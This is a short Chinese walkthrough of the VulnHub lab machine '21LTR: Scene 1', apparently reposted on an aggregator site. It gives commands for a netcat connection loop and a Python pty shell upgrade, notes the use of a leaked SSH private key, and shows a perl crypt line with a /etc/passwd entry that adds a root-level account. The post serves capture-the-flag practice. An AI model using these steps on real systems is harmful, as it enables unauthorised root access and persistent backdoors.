vulnhub攻略

Posted xm17

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了vulnhub攻略相关的知识,希望对你有一定的参考价值。

  1. https://www.vulnhub.com/entry/21ltr-scene-1,3/

    这个靶机国内https://www.cnblogs.com/hack404/p/11423228.html这个大佬有做过

    首先他的ip是192.168.2.120,这个很重要,自己配置一下环境,搞了半天ip都不同

    有几个坑点,当用telnet链接10001端口时,会提示链接重置,然后看了国外小哥

    使用while true; do nc -v 192.168.2.120 10001 && break;sleep 1;clear;done;命令,等一会,就自己打开了

    技术图片

    他的ssh私钥文件直接就给,看了一下  进/media目录,ls -R可以看到,

 

 

    技术图片

 

    然后用反弹没什么问题,然后用python开一个终端,

    python -c "import pty; pty.spawn(‘/bin/bash‘);"

    下载文件后,给id_ras权限,然后链接

    最后往/etc/passwd添加用户的时候,他这个生成密码看不懂,我不会

    perl -le ‘print crypt("10086","bb")‘ ,生成密码10086

    bugtest:bbma0iajVxQUI:0:0:root:/root:/bin/bash

    就可以登录了一般的难度

 

 

 

 

 

技术图片

 

以上是关于vulnhub攻略的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub靶机-MoriartyCorp

Vulnhub靶机-doubletrouble

Vulnhub靶机系列之BullDog_1

Vulnhub系列——持续更新

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

Vulnhub-napping